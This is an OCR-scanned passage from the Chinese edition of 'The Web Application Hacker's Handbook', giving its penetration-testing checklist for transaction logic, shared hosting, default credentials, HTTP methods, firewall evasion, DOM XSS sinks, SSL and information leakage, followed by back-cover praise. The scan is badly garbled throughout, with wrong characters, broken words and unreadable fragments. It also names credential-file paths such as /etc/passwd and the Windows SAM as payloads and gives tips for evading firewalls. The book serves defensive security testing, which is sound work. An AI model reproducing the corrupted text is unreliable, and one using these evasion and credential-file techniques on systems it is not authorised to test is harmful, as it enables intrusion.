过 验证 的 页 面 。 当 进行 这 种 转换 时 ， 测 试 应 用 程序 是 否 分 配 了 一 个 不 
相称 的 信任 级 别 。 

(3) 确定 是 否 可 利用 更 高 权限 的 功能 直接 或 间接 访问 或 者 猜测 某 


些 信息 。 


21.9.5 ”测试 交易 逻辑 


(1) 如 果 应 用 程序 设置 交易 限额 ， 测 试 提交 负 值 会 造成 什么 影 
啊 。 如 采 应 用 程序 接受 负 值 ， 束 可 以 通过 从 反方 癌 进 行 大 额 交 易 来 规 
避 这 种 限额 。 

(2) 分 析 是 否 可 以 使 用 一 连 串 的 交易 达成 一 种 状态 ， 然 后 利用 它 
达到 目的 。 例 如 ， 测试 是 否 可 以 在 账户 之 间 进 行 几 次 低 额 转账 ， 束 可 
以 产生 一 种 应 用 程序 的 逻辑 将 会 阻止 的 较 大 余额 。 

(3) 如 果 应 用 程序 根据 用 户 控制 的 数据 或 操作 确定 的 标准 调整 价 
格 或 其 他 敏感 价值 ， 诈 先 应 了 解 应 用 程序 使 用 的 算法 以 及 需要 调整 的 
逻辑 。 确 定 这 些 调整 是 一 次 性 行为 ， 还 是 需要 根据 用 户 执行 的 其 他 操 
作 进 行 修 改 。 

(4) 努力 想 办 法 操纵 应 用 程序 的 行为 ， 使 应 用 程序 进行 的 调整 与 
开发 者 最 初 设 定 的 标准 相互 矛盾 。 


21.10.1 测试 共享 基础 架构 之 间 的 隔离 


21.10.2 测试 使 用 ASP 主 机 的 应 用 程序 之 间 的 隔离 


图 21-11 测试 共享 主机 漏洞 


21.10.1 测试 共享 基础 架构 之 间 的 隔离 


(1) 如 果 应 用 程序 在 一 个 共享 基础 架构 中 运行 ， 分 析 它 为 共享 环 
境 中 的 客户 端 提供 的 用 于 更 新 和 管理 其 内 容 与 功能 的 访问 机 制 。 考 虑 


以 下 问题 。 
口 远 程 访问 机 制 是 否 使 用 一 个 安全 的 协议 与 经 过 适当 强 
化 的 基础 架构 ? 
口 客 户 病 是 否 能 够 访问 他 们 正 背 情况 下 不 能 访问 的 文 
件 、 数 据 及 其 他 资源? 
口 客户 疾 是 否 能 够 在 主机 环境 中 获得 一 个 交互 式 的 
shell ， 并 执行 任意 命令 ? 
(2) 如 果 使 用 一 个 所 有 权 应 用 程序 ， 以 方便 客户 端 配置 和 定制 共 
享 环境 ， 考 虑 是 否 能 够 以 这 个 应 用 程序 为 攻击 目标 ， 攻 破 该 环境 本 号 
以 及 其 中 运行 的 所 有 应 用 程序 。 
(3) 如 果 能 够 在 某 个 应 用 程序 中 执行 命令 、 注 入 SQL 脚本 或 访问 
0 
EP ° 


21.10.2 ”测试 使 用 ASP 主 机 的 应 用 程序 之 间 的 隔离 


(1) 如 果 使 用 ASP 主 机 的 应 用 程序 由 许多 共享 与 定制 组 件 构成 ， 
确定 其 中 的 任意 共 至 组 件 ， 如 日 志 机 制 、 管 理 功能 以 及 数据 库 代 码 组 


和 
程序 。 


(2) 如 采 共 享 环 境 使 用 一 个 常用 的 数据 库 ， 使 用 NGSSquirrel 之 
类 的 数据 库 扫 摘 工 具 ， 全 面 审查 数据 库 配 置 、 补 丁 版 本 、 表 结构 以 及 
许可 。 数 据 库 安全 模型 中 存在 的 任何 缺陷 都 可 加 以 利用 ， 将 攻击 范围 
由 一 个 应 用 程序 扩大 到 男 一 个 应 用 程序 。 


21.11.3 测试 危险 的 HTTP 方法 


21.11.6 测试 Web 服 务 硕 软件 漏洞 


21.11.7 测试 Web 应 用 程序 防火 墙 


图 21-12 ”测试 Web 服务 器 漏洞 


21.11.1 _ 测试 默认 证 书 


(1) 检查 应 用 程序 解析 过 程 中 获得 的 结果， 确定 应 用 程序 使 用 
的 、 可 能 包含 可 访问 的 管理 接口 的 Web 服 务 右 与 其 他 技术 。 


(2) 对 Web 服 务 器 进行 端口 扫描 ， 确 定 在 指向 主 目标 应 用 程序 的 
不 同 端口 上 运行 的 所 有 管理 接口 。 

(3) 对 于 确定 的 接口 ， 查 阅 制造 商 文档 资料 与 常用 默认 密码 表 ， 
获得 默认 证 书 。 

ag O 如 果 黑 认证 书 无 效 ， 使 用 21 A RAR BED 

证 书 。 

(5) 如 果 能 够 访问 管理 接口 ， 审 查 可 用 的 功能 ， 确 定 是 否 可 以 利 
用 这 项 功能 进一步 攻破 主机 与 主 应 用 程序 。 


21.11.2 ”测试 默认 内 容 


(1) 分 析 Nikto 扫 描 结 果 〈21.1.4 节 中 的 第 1 步 ) ， 确 定 服务 器 上 
存在 的 、 但 并 不 属于 应 用 程序 的 默认 内 容 。 

(2) 使 用 搜索 引擎 与 其 他 资源 (如 www.exploit-db.com) 确定 已 
知 应 用 程序 所 使 用 的 技术 的 默认 内 容 与 功能 。 如 有 可 能 ， 在 本 地 安装 
这 些 技 术 ， 并 在 其 中 碍 找 可 在 渗透 测试 中 利用 的 所 有 默认 功能 © 

(3) 检查 默认 内 容 ， 从 中 查找 任何 可 用 于 攻击 服务 器 或 应 用 程序 
的 功能 或 漏洞 。 


21.11.3 ”测试 危险 的 HTTP 方 法 


(1) 使 用 OPTIONS 方 法 列 出 服务 器 使 用 的 HTTP 方 法 。 请 注意 ， 
不 同 目录 中 激活 的 方法 可 能 各 不 相同 。 可 以 使 用 Paros 进 行 漏洞 扫描 ， 
帮助 完成 这 个 检查 。 

(2) 手动 测试 每 一 种 方法 ， 确 认 其 是 否 可 用 。 

(3) 如 果 发 现 一 些 WebDAV 方 法 被 激活 ， 使 用 一 个 激活 WebDAV 
的 客户 端 进行 深入 调查 ， 如 Microsoft FrontPage 或 Internet Explorer 中 的 
Open as Web Folder (以 Web 文 件 夹 打 开 ) 选项 。 


21.11.4 ”测试 代理 功能 


(1) 使 用 GET 与 CONNECT 请 求 ， 党 试 使 用 Web 服 务 器 作为 代理 
服务 器 ， 连 接 因特网 上 的 其 他 服务 器 ， 并 获取 其 中 的 内 容 。 

(2) 尝试 使 用 前 面 描述 的 两 种 技巧 连接 主机 基础 架构 中 的 不 同 IJ 
地 址 与 端口 。 


(3) 尝试 使 用 前 面 描 述 的 两 种 技巧 ， 在 请 求 中 指定 127.0.0.1 为 目 
标 主机 ， 和 连接 web 服务器 上 的 利用 端口 号 。 


21.11.5 ”测试 虚拟 主机 配置 不 当 


(1) 使 用 以 下 方式 向 根 日 录 提交 GET 请 求 : 
J 正确 的 Host 消 息 头 : 
口 恶 意 Host 消 息 头 ; 
口 Host 消 息 头 中 的 服务 器 IP 地 址 ; 
口 无 Host 消 息 头 〈 仅 使 用 HTTP/1.0) ° 
(2) 比较 对 这 些 请 求 的 响应 。 常 见 的 结果 是 ， 在 Host 消 息 头 中 使 
用 服务 器 的 IP 地 址 获得 目录 列表 。 还 可 以 获得 各 种 默认 内 容 。 
(3) 如 果 观 测 到 应 用 程序 表现 出 不 同 的 行为 ， 使 用 生成 不 同 结果 
的 主机 名 称 重 复 21.1 节 描述 的 应 用 程序 解析 过 程 。 一 定 要 使 用 -vhost 选 
项 进行 一 次 Nikto 扫 描 ， 确 定 在 最 初 的 应 用 程序 解析 过 程 中 忽略 的 默认 


21.11.6 ”测试 Web 服 务 器 软件 漏洞 


(1) 使 用 Nessus 与 所 拥有 的 所 有 其 他 类 似 的 扫描 器 ， 确 定 所 测试 
的 Web 服 务 絮 软件 中 存在 的 所 有 已 知 漏洞 。 

(2) 同时 ， 浏 览 Security Focus、Bugtraq 和 Full Disclosure 等 资 
源 ， 在 攻击 目标 中 查找 最 近 发 现 的 、 尚 未 修复 的 漏洞 信息 。 

(3) 如 果 应 用 程序 由 第 三 方 开发 ， 确 定 它 是 否 目 带 web 服务 器 
(通常 为 一 个 开源 服务 器 ) ; 如 果 是 ， 在 这 个 服务 器 中 查找 所 有 漏 
洞 。 请 注意 ， 在 这 种 情况 下 ， 服务 句 的 标准 版 本 信息 可 能 已 被 修改 。 

(4) 如 有 可 能 ， 应 该 考虑 在 本 地 安装 所 测试 的 软件 ， 并 自己 进行 
测试 ， 查 找 尚未 发 现 或 广泛 流传 的 新 漏洞 。 


21.11.7 ”测试 Web 应 用 程序 防火 墙 


(1) 在 参数 值 中 使 用 明确 的 攻击 有 效 载荷 向 应 用 程序 (最 好 是 啊 
应 中 包含 名 称 和 /或 值 的 某 个 应 用 程序 位 置 ) 提交 任意 参数 名 称 。 如 果 
应 用 程序 阻止 该 攻击 ， 这 可 能 是 由 于 外 部 防御 机 制 所 致 。 

(2) 如 果 可 以 提交 在 服务 器 啊 应 中 返回 的 变量 ， 则 提供 一 系列 模 
糊 测 试 字符 串 及 这 些 字符 串 的 编码 形式 可 以 确定 应 用 程序 的 用 户 输 入 


防御 行为 。 

(3) 对 应 用 程序 中 的 变量 实施 相同 的 攻击 来 确认 这 一 行为 。 

(4) 对 于 所 有 模糊 测试 字符 串 和 请 求 ， 使 用 标准 签名 数据 库 中 不 
可 能 存在 的 有 效 载 何 字符 串 。 根 据 定 义 ， 我 们 不 可 能 提供 这 些 字 符 串 
的 示例 。 但 是 ， 在 进行 文件 检索 时 ， 应 避免 将 /etcpasswd 
或 /windows/system32/config/sam 作 为 有 效 载 集 。 此 外 ， 应 在 XSS 攻 击 中 
避免 使 用 <script>， 并 避免 将 alert () 或 xss 用 作 XSS 有 效 载 何 。 

(5) 如果 特定 请 求 被 阻止 ， 可 以 党 试 在 其 他 位 置 或 上 下 文中 提交 
相同 的 参数 。 例 如 ， 在 GET 请 求 的 URL 中 、 在 POST 请 求 主体 中 ， 以 及 
在 POST 请 求 的 URL 中 提交 相同 的 参数 。 

(6) 此外， 应 尝试 在 ASPNET 上 将 参数 作为 cookie 提 交 。 如 果 在 
查询 字符 串 或 消 恩 主体 中 找 不 到 参数 foo，API Request.Params[“foo”] 会 
检索 名 为 foo 的 cookie 的 值 。 

(7) 回顾 第 4 章 中 介绍 的 引入 用 户 输入 的 所 有 其 他 方法 ， 选 择 其 
中 任何 不 受 保护 的 方法 。 

(8) 确定 以 非 标准 格式 (如 序列 化 或 编码 ) 或 可 能 以 此 类 格式 提 
交 用 户 输入 的 位 置 。 如 果 找 不 到 此 类 位 置 ， 可 以 通过 串联 字符 串 和 /或 
将 字符 串 分 布 到 多 个 参数 中 来 构建 攻击 字符 串 。 (注意 ， 如 果 目 标 是 
可 以 使 用 HPP 通 过 同一 变量 的 各 种 变 体 来 串联 攻击 字符 
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21.12.1 ”测试 基于 DOM 世 


(1) 对 应 用 程序 中 包含 的 每 一 段 JavaScript 脚 本 进行 简单 的 代码 
审查 ， 确 定 可 通过 任何 一 个 专门 设计 的 URL、 在 相关 页 面 的 DOM 中 引 
入 恶意 数据 而 触发 的 XSS 或 重 定向 漏洞。 审查 内 容 包 括 HTML 页 面 
o 中 的 所 有 单独 的 JavaScript 文 件 和 脚 

(2) 确定 使 用 以 下 API 的 所 有 情况 ， 使 用 这 些 API 可 访问 通过 一 
个 专门 设计 的 URL 控 制 的 DOM 数 据 : 


document. location 
document .URL 
document . URLUnencoded 
document . referrer 
window.location 


(3) 在 代码 中 追踪 相关 数据 ， 确 定 应 用 程序 对 它 执行 何 种 操作 。 
如 果 数 据 (或 它 的 一 个 被 操纵 的 表单 ) 被 提交 给 下 列 API 中 的 一 个 ， 
那么 应 用 程序 可 能 易于 受到 XSS 攻 击 : 


cgocument.write () 


Gocument .writeln() 
Gocument .body. innerktml 
evalt{)} 

window. execScript({)} 
window. setInterval() 


window. setTimeout ( ) 


(4) 如 果 数 据 被 提交 给 下 列 API 中 的 一 个 ， 那 么 应 用 程序 可 能 
于 受到 重 定 加 攻击 : 

document. location 

document . URL 

document. open {} 

window. location.href 

window.navigate() 


window. open { } 


21.12.2 ”测试 本 地 隐私 漏洞 


(1) 检查 拦截 代理 服务 器 生成 的 日 志 ， 确 定 测试 过 程 中 应 用 程序 
送出 的 所 有 Set-Cookie 指 令 。 如 果 发 现 有 任何 Set-Cookie 指 令 包 含 一 个 
将 来 日 期 的 expires 必 性， 用 户 的 浏 跑 右 会 将 该 cookie 保 持 到 这 个 日 
期 。 检 碍 传送 敏感 数据 的 持久 性 cookie 的 所 有 内 容 。 

(2) 如 果 一 个 持久 性 cookie 中 包含 敏感 数据 ， 那 么 本 地 攻击 者 就 
能 够 截获 这 些 数据 。 即 使 这 些 数据 补 加 密 ， 截 获 它们 的 攻击 者 仍然 可 
oo 新 提交 给 应 用 程序 ， 访 问 该 cookie 访 问 的 任何 数据 或 
功能 。 

(3) 如 果 包 含 敏感 数据 的 页 面 通过 HTTP 访 问 ， 在 服务 器 啊 应 中 
寻找 缓存 指令 。 如 果 其 中 没有 下 列 指 令 〈 在 HITP 消 息 头 或 HTML 元 标 
签 中 ) ， 那 么 相关 页 面 可 能 被 一 个 或 几 个 浏览 器 存 入 缓存 : 


Expires: 0 
Cache-control: no-cache 
Pragma: no-cache 


(4) 确定 应 用 程序 中 通过 UREL 参 数 传送 敏感 数据 的 所 有 情况 。 如 
检查 浏览 器 的 历史 记录 ， 证 实 这 些 数据 已 经 保存 
EPH” 

(5) 对 于 用 户 提交 敏感 数据 〈 如 信用 卡 信息 ) 的 所 有 表单 ， 审 查 
其 中 的 HTML 源 代码 。 如 果 没 有 在 表单 标签 或 输入 字段 的 标签 中 设置 
autocomplete=off 属 性 ， 输 入 的 数据 将 保存 在 激活 自动 完成 的 浏 贤 屁 
中 o 


21.12.3 ”测试 脆弱 的 SsL 加 密 算法 


(1) 如 果 应 用 程序 使 用 SSL 进 行 通信 ， 使 用 THCSSLCheck 工 具 列 
出 它 支 持 的 加 密 算法 和 协议 。 

(2) 如 果 SSL 支 持 脆 弱 或 过 时 的 加 密 算 法 和 协议 ， 处 在 适当 位 置 
的 攻击 者 就 可 以 实施 攻击 ， 降 级 或 破译 应 用 程序 用 户 的 SSL 通 信 ， 访 
问 他 们 的 敏感 数据 。 

(3) 一 些 Web 服 务 器 声称 它 支持 某 些 脆弱 加 密 算 法 和 协议 ， 但 如 
果 客 户 提出 请 求 ， 它 实际 上 拒绝 使 用 这 些 算法 和 协议 完成 握手 。 在 使 
用 THCSSLCheck 工 具 时 ， 这 种 情况 可 能 会 造成 错误 警报 。 可 以 使 用 
Opera 浏 览 器 ， 尝 试 通过 指定 的 脆弱 协议 完成 一 次 握手 ， 确 定 是 否 可 使 
用 这 些 协议 访问 应 用 程序 。 


21.12.4 “检查 同 源 策 略 配置 


(1) 检查 /crossdomain.xml 文 件 。 如 果 应 用 程序 允许 无 限制 访问 
(通过 指定 <allow-access-from domain=“*” />) ， 来 自 其 他 站 点 的 Flash 
对 象 可 以 “和 登 置 > 应 用 程序 用 户 的 会 话 ， 以 进行 双 同 交互 。 这 导致 任何 
其 他 域 可 以 检索 所 有 数据 ， 并 执行 任何 用 户 操 作 。 
(2) 检查 /clientaccesspolicy.xml 文 件 。 与 Flash 类 似 ， 如 果 <cross- 
domain-access> 配 置 过 于 宽 沁 ， 其 他 站 点 将 可 以 与 接受 测试 的 站 点 进行 
双 问 交互 。 


(3) 通过 添加 指定 其 他 域 的 Origin 消 息 头 并 检查 返回 的 任何 
Access-Control 消 息 头 ， 使 用 XMLHttpRedquest 测 试 应 用 程序 如 何 处 理 跨 
域 请 求 。 人 允许 任何 域 、 或 指定 的 其 他 域 进行 双 癌 交互 的 安全 隐患 与 
Flash 跨 域 策 略 造成 的 安全 隐患 相同 。 


21.13 “检查 信息 泄露 


(1) 在 探查 目标 应 用 程序 的 整个 过 程 中 ， 监 控 它 的 啊 应 ， 查 找 可 
能 a a 
的 错误 消 

(2) 如 果 收 到 不 常见 的 错误 消息 ， 使 用 标准 的 搜索 引擎 检查 这 些 
消 思 。 可 以 使 用 各 种 高 级 搜索 符 性 缩小 搜索 范围 。 例 如 : 


"unable to retrieve" filetype:php 


(3) 检查 搜索 结果 ， 寻 找 关 于 错误 消息 的 所 有 讨论 以 及 其 他 出 现 
相同 请 轧 的 所 有 站 点 。 其 他 应 用 程序 生成 的 同一 条 错误 消息 可 能 更 详 
细 ， 有 助 于 渗透 测试 员 更 好 地 了 解 错误 条 件 。 使 用 搜索 引擎 缓存 获取 
不 再 出 现在 当前 应 用 程序 中 的 错误 消 轧 。 

(4) 使 用 Google 代 码 搜 索 查 找 生 成 特定 错误 消息 的 、 公 开发 布 的 
所 有 代码 。 搜 索 可 能 被 硬 编码 到 应 用 程序 源 代码 中 的 错误 消 恩 代码 
D a a 
列 如 : 


unable\ to\ retrieve lang:php package:mail 


(5) 如 果 获 得 包含 库 与 第 三 方 代码 组 件 名 称 的 栈 追 踪 错 误 消 息 ， 
在 上 述 两 种 搜索 引擎 中 搜索 这 些 名 称 。 


“关于 墨客 攻防 技术 ， 没 有 一 本 书 能 比 这 本 书 讲 解 得 更 为 透彻 和 全 
H! 99 
Jason Haddix， 患 普 公 司 渗透 测试 总 监 
“如 果 你 对 Web 应 用 程序 安全 感 兴趣 ， 我 强烈 推荐 本 书 ， 它 实 为 


Web 安 全 人 士 必 读 之 作 。” 
Robert Wesley McGrew, McGrew 安 全 公司 研究 人 员 


“第 1 版 本 来 束 是 Web 安 全 领域 的 撕 之 作 ， 第 2 版 可 谓 经 典 之 上 的 
完善 ， 绝 对 值得 拥有 ! ” 
Daniel Miessler， 安 全 顾问 


The Web Application Hacker's Handbook Finding and Exploiting 
Security Flaws Second Edition 


黑客 攻防 技术 宝典 Web 实 战 篇 (第 2 版 ) 


Web 应 用 无 处 不 在 ， 安 全 隐患 如 影 随 形 。 承 载 厦 丰富 功能 与 用 途 
的 Web 应 用 程序 中 布 满 了 各 种 漏洞 ， 攻 击 者 能 够 利用 这 些 漏洞 瓷 取 用 
尸 资 料 ， 实 施 诈 纹 ， 破 坏 其 他 系统 等 。 近 年 来 ， 一 些 公司 的 网 络 系统 
频频 遭受 攻击 ， 导 致 用 户 信息 泄露 ， 造 成 不 恨 影响 。 因 此 ， 如 何 确保 
Web 应 用 程序 的 安全 ， 已 成 为 摆 在 人 们 眼前 到 待 解决 问题 。 


本 书 是 Web 安 全 领域 专家 的 经 验 结晶 ， 系 统 阅 述 了 如 何 针对 Web 
应 用 程序 展开 攻击 与 反攻 击 ， 深 入 旗 析 了 攻击 时 所 使 用 的 技巧 、 步 又 
和 工具 ， 条 理 清晰 ， 内 容 详尽 。 第 2 版 全 面 逢 级， 涵盖 了 最 新 的 攻击 技 
巧 与 应 对 措施 ， 此 外 ， 书 中 还 列 出 了 几 百 个 “漏洞 实验 宇 ”"， 以 帮助 读 
者 对 所 学 内 容 进 行 巩固 和 实战 演习 。 


